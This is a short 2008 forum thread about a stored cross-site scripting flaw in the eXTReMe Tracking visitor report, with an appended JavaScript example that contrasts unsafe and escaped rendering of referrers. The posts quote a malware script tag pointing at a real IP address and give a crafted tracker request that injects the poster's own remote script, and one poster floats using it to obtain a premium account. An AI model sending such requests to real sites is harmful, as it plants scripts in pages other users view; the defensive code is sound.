
eXTReMe Tracking XSS – 4 Posts

  • eXTReMe Tracking XSS

    01/15/2008 12:59
    quangntenemy 7120
    I use this one to track visitors coming to my blog.
    Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:

        <script src=http://121.15.220.104/1.js></script>

    which is the signature for the virus.

    Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:
    http://www.flickr.com/photos/22823442@N02/2195246062/
    What happened? No, neither my comp nor any other computer around was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted into the page.

    Now let's see if I can "forge" the referer to insert my own script into the page :)
  • 01/15/2008 12:59
    alt3rn4tiv3 2940
    Haha. The ad writes "好消息", aka "good news" :D

    P.S. Forum is not Asian-languages compatible.
  • 01/15/2008 12:59
    quangntenemy 7120
    I finally managed to reproduce the XSS in a "nice" way :)
    First you need to request the page:
    http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search
    Then wait for a few minutes and you'll see the XSS here: http://extremetracking.com/open;ref1?login=qpenguin
    Screenshot:
    http://www.flickr.com/photos/22823442@N02/2194552167/

    Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one :)
  • 01/15/2008 12:59
    UnknownUser 2,7290
    jup that's pretty bad.
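
The flaw discussed in this thread (a stored referrer decoded and written into a report page as markup) next to its fix, as an added example that is not part of the original posts and is not eXTReMe Tracking's code. The function names, the sample referrer and the `example.invalid` host are constructed, and the example assumes the decoding step is percent-decoding, as in the URL-encoded referrer posted above.

```javascript
// Hypothetical referrer-report renderer (illustration only).
// Constructed sample: a search referrer whose query contains markup,
// URL-encoded the way it would arrive at the tracker.
const SAMPLE_REFERRER =
  'http://www.google.com/search?hl=en&q=%3Cscript+src%3Dhttp%3A//example.invalid/x.js%3E%3C/script%3E';

// Decode percent-escapes and '+' so the report shows a readable query.
function decodeReferrer(raw) {
  try {
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  } catch (e) {
    return raw; // malformed escape sequence: keep the raw string
  }
}

// Encode the characters that are significant in HTML text and attributes.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Flawed: the decoded referrer is concatenated into the page as markup,
// so a <script> in the search query becomes a live element for every viewer.
function renderRowUnsafe(raw) {
  return '<li>' + decodeReferrer(raw) + '</li>';
}

// Fixed: decode for readability, then encode at the point of output.
// A link is emitted only for http(s) referrers; anything else is plain text.
function renderRowSafe(raw) {
  const text = escapeHtml(decodeReferrer(raw));
  const href = /^https?:\/\//i.test(raw) ? escapeHtml(raw) : null;
  return href
    ? `<li><a href="${href}" rel="nofollow noreferrer">${text}</a></li>`
    : `<li>${text}</li>`;
}

// Check helper: does the rendered row contain a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Because the referrer is attacker-controlled input that is stored and later shown to other users, the encoding has to happen at render time in the report page, whatever filtering was applied when the hit was logged.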